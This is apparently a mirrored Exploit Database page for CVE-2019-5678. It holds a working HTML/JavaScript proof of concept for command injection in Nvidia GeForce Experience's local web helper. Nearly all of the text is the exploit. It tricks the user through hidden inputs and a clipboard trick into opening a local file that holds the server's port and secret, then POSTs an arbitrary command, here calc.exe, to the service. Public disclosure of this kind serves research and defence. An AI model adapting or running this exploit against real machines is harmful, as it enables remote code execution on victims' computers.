Nvidia GeForce Experience Web Helper – Command Injection

• Exploit Database
• 109 阅读

• 作者： Rhino Security Labs
  日期： 2019-06-03
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46972/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67

  <!-- POC for CVE‑2019‑5678 Nvidia GeForce Experience OS command injection via a web browser Author: David Yesland -- Rhino Security Labs --> <html> <head> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script> </head> <body> <script> //Send request to local GFE server function submitRequest(port,secret) { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/127.0.0.1:"+port+"\/gfeupdate\/autoGFEInstall\/", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "text\/html"); xhr.setRequestHeader("X_LOCAL_SECURITY_COOKIE", secret); var body = "\""+document.getElementById("cmd").value+"\""; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); }   $(document).on(&apos;change&apos;, &apos;.file-upload-button&apos;, function(event) { var reader = new FileReader();   reader.onload = function(event) { var jsonObj = JSON.parse(event.target.result); submitRequest(jsonObj.port,jsonObj.secret); }   reader.readAsText(event.target.files[0]); });   //Copy text from some text field function myFunction() { var copyText = document.getElementById("myInput"); copyText.select(); document.execCommand("copy");   }   //trigger the copy and file window on ctrl press $(document).keydown(function(keyPressed) { if (keyPressed.keyCode == 17) { myFunction();document.getElementById(&apos;file-input&apos;).click(); } }); </script> <h2> Press CTRL+V+Enter </h2> <!--Command to run in a hidden input field--> <input type="hidden" value="calc.exe" id="cmd" size="55"> <!--Hidden text box to copy text from--> <div style="opacity: 0.0;"> <input type="text" value="%LOCALAPPDATA%\NVIDIA Corporation\NvNode\nodejs.json" id="myInput" size="1"> </div> <!--file input--> <input id="file-input" onchange="file_changed(this)" onclick="this.value=null;" accept="application/json" class=&apos;file-upload-button&apos; type="file" name="name" style="display: none;" /> </body> </html>